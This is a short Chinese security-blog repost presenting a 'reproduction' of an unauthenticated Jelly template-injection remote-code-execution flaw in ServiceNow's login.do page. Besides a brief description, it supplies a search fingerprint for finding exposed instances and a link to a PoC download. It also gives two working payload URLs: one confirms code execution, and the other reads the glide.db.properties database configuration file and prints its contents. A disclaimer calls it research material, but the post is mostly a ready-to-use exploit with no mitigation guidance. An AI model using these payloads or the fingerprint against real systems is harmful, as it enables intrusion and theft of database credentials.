ServiceNow存在login.do命令执行漏洞

admin 2024年7月20日10:46:54评论45 views字数 988阅读3分17秒阅读模式
1

漏洞描述
ServiceNow是一个领先的企业级云计算平台提供商,致力于帮助组织实现数字化转型和自动化工作流程。ServiceNow的目标是通过提供全面的IT服务管理、IT运营管理和IT业务管理解决方案。该平台Platform版本中存在输入验证漏洞的问题,从而导致jelly模板注入漏洞,未经身份验证的用户能够在Now Platform的上下文中远程执行代码。ServiceNow对托管实例应用了更新,并向合作伙伴和自助客户发布了更新。

2
漏洞复现
首页

ServiceNow存在login.do命令执行漏洞

执行1024*1024命令

ServiceNow存在login.do命令执行漏洞

3
网络测绘
icon_hash="1701804003"

4
漏洞POC
https://www.123pan.com/s/LAooTd-zeNPH.html

地址/login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(12345*12345);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E
读配置文件
地址/login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E%22
 

原文始发于微信公众号(我吃饼干):【漏洞复现】ServiceNow存在login.do命令执行漏洞

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月20日10:46:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ServiceNow存在login.do命令执行漏洞https://cn-sec.com/archives/2973502.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息